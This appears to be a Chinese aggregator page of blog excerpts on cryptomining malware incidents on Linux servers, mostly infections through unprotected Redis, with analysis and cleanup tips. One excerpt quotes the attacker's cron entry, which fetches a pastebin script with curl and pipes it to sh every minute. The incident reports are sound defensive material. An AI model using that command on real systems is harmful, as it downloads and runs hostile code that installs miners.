原文:记一次利用redis横向移动挖矿分析

该木马使用Linux系统的shell脚本编写Downloader,使用curl与wget命令发起网络请求下载木马的其他组件,虽然代码可被轻易分析,但是编写成本和门槛降低,这也是当前恶意代码使用脚本语言编写的一个趋势。 攻击者通过RCE执行可疑脚本 .挖矿流程分析图 .下面分析挖矿程序的初始化脚本 ...

2021-01-25 17:20 0 704 推荐指数:

查看详情

一次redis病毒分析笔记

起因 偶然间发现redis里有一个陌生key:tightsoft,它的值是:*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道这肯定不是我们存的,再看value我警觉了,这是要定时执行脚本啊。 分析 ...

Wed Sep 05 23:13:00 CST 2018 2 944
一次 挖矿程序入侵和处理

为了方便远程使用,师弟把实验室的电脑映射的公网上,结果被植入了挖矿程序 挖矿软件是这个,因为已经被清理掉了,所以看不到运行了,不然的话,使用 nvidia-smi 命令可以看到这个挖矿程序在工作。 然后进入到这个进程中, cd /proc/$PID , 查看它的信息 ...

Fri May 28 23:43:00 CST 2021 0 215
一次linux挖矿木马应急

1.拿到了一个靶机,top检查,发现有一个进程CPU利用率一直在百分之百,经过特征对比,发现是挖矿木马 2.利用 ll /proc/端口ID/exe 定位木马文件所在位置 3.rm -rf 删除掉木马文件 4.原本以为搞定了,过了一会发现还是有利用率百分之百情况 5.查看 cat ...

Fri Aug 16 16:19:00 CST 2019 0 523
一次挖矿木马的较量---linux下的挖矿

一次挖矿木马的较量 聚铭网络 2022-02-22 10:51:18 78105 1 一、概述 本文主要是记录了一次针对挖矿程序的应急响应处理,从三个部分来解读此次事件 ...

Wed Mar 16 18:17:00 CST 2022 0 1048
一次Linux服务器因redis漏洞的挖矿病毒入侵

中毒原因,redis bind 0.0.0.0 而且没有密码,和安全意识太薄弱。 所以,redis一定要设密码,改端口,不要用root用户启动,如果业务没有需要,不要bind 0.0.0.0!!!!!!!!!!! 这个病毒能都横向传播,不要以为在外网redis的端口不通就没有事情。只要内网 ...

Sun Apr 14 01:28:00 CST 2019 0 1889
一次云服务器被挖矿的经历

收到中毒邮件通知 收到通知后思前想后,也不知道问题在哪,第一次遇到这事…… 分析 一查这是个挖矿软件,遂进入该目录 crontab 是定时任务,打开一看是: curl 是下载命令,定时下载init.sh脚本,浏览器手动下载后,立马被火绒拦截。我把它救出来后打开脚本,正是下载病毒 ...

Thu Aug 22 21:23:00 CST 2019 0 1624
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM